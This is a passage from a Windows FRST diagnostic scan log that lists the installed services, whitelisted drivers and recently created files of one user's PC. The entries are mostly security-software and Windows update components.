2015-12-02] (McAfee, Inc.)R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [782608 2015-08-21] (McAfee, Inc.)R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.6.1180.0\McCSPServiceHost.exe [1694152 2015-09-01] (McAfee, Inc.)R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [368048 2015-07-21] (McAfee, Inc.)R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [368048 2015-07-21] (McAfee, Inc.)S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [639456 2015-07-17] (McAfee, Inc.)R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [368048 2015-07-21] (McAfee, Inc.)R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [368048 2015-07-21] (McAfee, Inc.)R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-06-29] (McAfee, Inc.)R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [373704 2015-07-15] (McAfee, Inc.)R3 mfevtp; C:\Windows\system32\mfevtps.exe [254792 2015-06-29] (McAfee, Inc.)R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [368048 2015-07-21] (McAfee, Inc.)S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1873696 2015-11-05] (NVIDIA Corporation)R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5568288 2015-11-05] (NVIDIA Corporation)R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [87552 2013-10-14] (Softex Inc.) [File not signed]S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]R2 SCManager; C:\Program Files (x86)\SafeConnect\scManager.sys [176936 2016-01-11] (Impulse Point, LLC)R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [339456 2013-08-16] (IDT, Inc.) [File not signed]R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [32768 2013-08-01] (Validity Sensors, Inc.) [File not signed]S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-12-06] (Microsoft Corporation)S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X] ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [77536 2015-07-02] (McAfee, Inc.)R0 dcrypt; C:\Windows\System32\drivers\dcrypt.sys [210632 2014-07-09] ()S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-08-29] (Intel Corporation)R3 ikbevent; C:\Windows\System32\DRIVERS\ikbevent.sys [21408 2013-08-08] ()R3 imsevent; C:\Windows\System32\DRIVERS\imsevent.sys [21920 2013-08-08] ()R3 INETMON; C:\Windows\System32\Drivers\INETMON.sys [29088 2013-08-07] ()R3 ISCT; C:\Windows\system32\drivers\ISCTD64.sys [46568 2013-08-07] ()R3 KeyScrambler; C:\Windows\System32\drivers\keyscrambler.sys [224720 2015-08-18] (QFX Software Corporation)R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-26] (Malwarebytes)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)R3 MEIx64; C:\Windows\system32\drivers\TeeDriverx64.sys [99288 2013-08-09] (Intel Corporation)R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [412440 2015-07-02] (McAfee, Inc.)R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [347800 2015-07-02] (McAfee, Inc.)R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496888 2015-07-02] (McAfee, Inc.)R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [875928 2015-07-02] (McAfee, Inc.)R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [529080 2015-06-28] (McAfee, Inc.)S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109728 2015-06-28] (McAfee, Inc.)R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344704 2015-07-02] (McAfee, Inc.)R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20768 2015-11-05] (NVIDIA Corporation)R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [50472 2015-11-05] (NVIDIA Corporation)R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [429272 2013-08-21] (Realsil Semiconductor Corporation)R3 RTWlanE; C:\Windows\System32\DRIVERS\rtwlane.sys [2988760 2015-11-14] (Realtek Semiconductor Corporation )S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2013-08-01] (Synaptics Incorporated)R3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [34544 2013-08-01] (Synaptics Incorporated)S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52592 2015-09-23] (Cisco Systems, Inc.)S3 clwvd; system32\DRIVERS\clwvd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-26 16:22 - 2016-01-26 16:23 - 00032209 _____ C:\Users\Rich\Downloads\FRST.txt2016-01-26 16:21 - 2016-01-26 16:22 - 00000000 ____D C:\FRST2016-01-26 16:21 - 2016-01-26 16:21 - 02370560 _____ (Farbar) C:\Users\Rich\Downloads\FRST64.exe2016-01-24 12:49 - 2016-01-24 13:07 - 00078582 _____ C:\Users\Rich\Desktop\Supervision poster.pptx2016-01-24 11:30 - 2016-01-24 11:30 - 00317421 _____ C:\Users\Rich\Downloads\Supervision Syllabus.pdf2016-01-24 11:30 - 2016-01-24 11:30 - 00317421 _____ C:\Users\Rich\Downloads\Supervision Syllabus (1).pdf2016-01-22 16:39 - 2016-01-22 16:39 - 00068752 _____ C:\Users\Rich\Downloads\2015TurboTaxReturn.pdf2016-01-20 13:02 - 2016-01-20 13:02 - 00061781 _____ C:\Users\Rich\Downloads\alcohol2_pp.sav2016-01-20 13:01 - 2016-01-20 13:01 - 00035137 _____ C:\Users\Rich\Downloads\alcohol2.sav2016-01-19 19:09 - 2016-01-19 19:10 - 02315850 _____ C:\Users\Rich\Downloads\CLP6529_Roster_2015_filled.pdf2016-01-18 09:18 - 2016-01-18 09:18 - 00000000 ____D C:\Users\Rich\AppData\Roaming\QFX Software2016-01-18 09:18 - 2016-01-18 09:18 - 00000000 ____D C:\ProgramData\QFX Software2016-01-18 09:01 - 2016-01-18 09:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeyScrambler2016-01-18 09:01 - 2016-01-18 09:01 - 00000000 ____D C:\Program Files (x86)\KeyScrambler2016-01-18 09:01 - 2015-08-18 11:25 - 00224720 _____ (QFX Software Corporation) C:\Windows\system32\Drivers\keyscrambler.sys2016-01-18 09:00 - 2016-01-18 09:00 - 01555512 _____ C:\Users\Rich\Downloads\KeyScrambler_Setup.exe2016-01-18 08:18 - 2016-01-18 08:19 - 03694467 _____ C:\Users\Rich\Downloads\Change02_2014.pptx2016-01-17 18:11 - 2016-01-17 18:12 - 08770931 _____ C:\Users\Rich\Downloads\Re%3a_Supervision_Models.zip2016-01-15 16:49 - 2016-01-26 16:12 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2016-01-15 16:47 - 2016-01-15 16:47 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2016-01-15 16:47 - 2016-01-15 16:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2016-01-15 16:47 - 2016-01-15 16:47 - 00000000 ____D C:\ProgramData\Malwarebytes2016-01-15 16:47 - 2016-01-15 16:47 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware2016-01-15 16:47 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys2016-01-15 16:47 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2016-01-15 16:47 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys2016-01-15 16:45 - 2016-01-15 16:46 - 22908888 _____ (Malwarebytes ) C:\Users\Rich\Downloads\mbam-setup-2.2.0.1024.exe2016-01-13 20:56 - 2016-01-13 20:56 - 05952164 _____ C:\Users\Rich\Downloads\chp3_scanned_comments_Portillo.pdf2016-01-12 17:22 - 2015-12-11 13:57 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll2016-01-12 17:22 - 2015-12-08 16:54 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll2016-01-12 17:22 - 2015-12-08 16:54 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 01568768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 01325056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00902144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00815616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00740352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll2016-01-12 17:22 - 2015-12-08 16:54 - 00739328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00541184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL2016-01-12 17:22 - 2015-12-08 16:54 - 00154112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll2016-01-12 17:22 - 2015-12-08 16:53 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00970240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00509952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00193536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax2016-01-12 17:22 - 2015-12-08 16:53 - 00153600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00079872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL2016-01-12 17:22 - 2015-12-08 16:53 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll2016-01-12 17:22 - 2015-12-08 16:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe2016-01-12 17:22 - 2015-12-08 16:53 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe2016-01-12 17:22 - 2015-12-08 16:53 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksuser.dll2016-01-12 17:22 - 2015-12-08 16:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll2016-01-12 17:22 - 2015-12-08 14:07 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll2016-01-12 17:22 - 2015-12-08 14:07 - 02777088 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll2016-01-12 17:22 - 2015-12-08 14:07 - 01955328 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 01575424 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll2016-01-12 17:22 - 2015-12-08 14:07 - 01393152 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll2016-01-12 17:22 - 2015-12-08 14:07 - 01307136 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll2016-01-12 17:22 - 2015-12-08 14:07 - 01232896 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 01153024 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 01026048 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll2016-01-12 17:22 - 2015-12-08 14:07 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00978944 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00666112 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00642048 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00624640 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00447488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00292352 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00224768 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00223744 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL2016-01-12 17:22 - 2015-12-08 14:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll2016-01-12 17:22 - 2015-12-08 14:07 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe2016-01-12 17:22 - 2015-12-08 14:07 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\ksuser.dll2016-01-12 17:22 - 2015-12-08 14:06 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax2016-01-12 17:22 - 2015-12-08 14:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe2016-01-12 17:22 - 2015-12-08 14:04 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll2016-01-12 17:22 - 2015-12-08 13:54 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys2016-01-12 17:22 - 2015-12-08 13:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys2016-01-12 17:22 - 2015-12-08 13:11 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmkaud.sys2016-01-12 17:22 - 2015-12-08 12:58 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2016-01-12 17:22 - 2015-11-13 18:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll2016-01-12 17:22 - 2015-11-13 18:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll2016-01-12 17:22 - 2015-11-13 18:08 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\fixmapi.exe2016-01-12 17:22 - 2015-11-13 17:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll2016-01-12 17:22 - 2015-11-13 17:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll2016-01-12 17:22 - 2015-11-13 17:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe2016-01-12 17:21 - 2015-12-23 18:13 - 00387784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll2016-01-12 17:21 - 2015-12-23 17:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll2016-01-12 17:21 - 2015-12-12 13:54 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll2016-01-12 17:21 - 2015-12-12 13:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb2016-01-12 17:21 - 2015-12-12 13:30 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll2016-01-12 17:21 - 2015-12-12 13:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll2016-01-12 17:21 - 2015-12-12 13:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll2016-01-12 17:21 - 2015-12-12 13:15 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll2016-01-12 17:21 - 2015-12-12 13:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec2016-01-12 17:21 - 2015-12-12 13:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll2016-01-12 17:21 - 2015-12-12 13:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll2016-01-12 17:21 - 2015-12-12 13:07 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll2016-01-12 17:21 - 2015-12-12 13:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll2016-01-12 17:21 - 2015-12-12 13:07 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll2016-01-12 17:21 - 2015-12-12 13:03 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll2016-01-12 17:21 - 2015-12-12 13:02 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll2016-01-12 17:21 - 2015-12-12 13:02 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll2016-01-12 17:21 - 2015-12-12 13:02 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll2016-01-12 17:21 - 2015-12-12 13:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe2016-01-12 17:21 - 2015-12-12 13:02 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe2016-01-12 17:21 - 2015-12-12 12:55 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe2016-01-12 17:21 - 2015-12-12 12:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll2016-01-12 17:21 - 2015-12-12 12:49 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb2016-01-12 17:21 - 2015-12-12 12:44 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll2016-01-12 17:21 - 2015-12-12 12:40 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll2016-01-12 17:21 - 2015-12-12 12:39 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll2016-01-12 17:21 - 2015-12-12 12:37 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll2016-01-12 17:21 - 2015-12-12 12:37 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll2016-01-12 17:21 - 2015-12-12 12:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll2016-01-12 17:21 - 2015-12-12 12:37 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll2016-01-12 17:21 - 2015-12-12 12:36 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec2016-01-12 17:21 - 2015-12-12 12:36 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll2016-01-12 17:21 - 2015-12-12 12:35 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll2016-01-12 17:21 - 2015-12-12 12:33 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll2016-01-12 17:21 - 2015-12-12 12:31 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll2016-01-12 17:21 - 2015-12-12 12:30 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll2016-01-12 17:21 - 2015-12-12 12:28 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll2016-01-12 17:21 - 2015-12-12 12:27 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll2016-01-12 17:21 - 2015-12-12 12:27 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll2016-01-12 17:21 - 2015-12-12 12:27 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe2016-01-12 17:21 - 2015-12-12 12:25 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll2016-01-12 17:21 - 2015-12-12 12:23 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll2016-01-12 17:21 - 2015-12-12 12:22 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe2016-01-12 17:21 - 2015-12-12 12:21 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll2016-01-12 17:21 - 2015-12-12 12:20 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl2016-01-12 17:21 - 2015-12-12 12:19 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll2016-01-12 17:21 - 2015-12-12 12:18 - 14457856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll2016-01-12 17:21 - 2015-12-12 12:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll2016-01-12 17:21 - 2015-12-12 12:12 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll2016-01-12 17:21 - 2015-12-12 12:10 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll2016-01-12 17:21 - 2015-12-12 12:10 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll2016-01-12 17:21 - 2015-12-12 12:09 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll2016-01-12 17:21 - 2015-12-12 12:08 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll2016-01-12 17:21 - 2015-12-12 12:06 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll2016-01-12 17:21 - 2015-12-12 12:02 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll2016-01-12 17:21 - 2015-12-12 12:00 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll2016-01-12 17:21 - 2015-12-12 12:00 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl2016-01-12 17:21 - 2015-12-12 12:00 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll2016-01-12 17:21 - 2015-12-12 12:00 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll2016-01-12 17:21 - 2015-12-12 11:54 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll2016-01-12 17:21 - 2015-12-12 11:42 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll2016-01-12 17:21 - 2015-12-12 11:41 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll2016-01-12 17:21 - 2015-12-12 11:38 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll2016-01-12 17:21 - 2015-12-12 11:36 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll2016-01-12 17:21 - 2015-12-08 16:53 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll2016-01-12 17:21 - 2015-12-08 16:52 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll2016-01-12 17:21 - 2015-12-08 14:07 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll2016-01-12 17:21 - 2015-12-08 14:07 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll2016-01-12 17:21 - 2015-11-16 20:11 - 00025024 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe2016-01-12 17:21 - 2015-11-16 20:08 - 01381376 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll2016-01-12 17:21 - 2015-11-16 20:08 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll2016-01-12 17:21 - 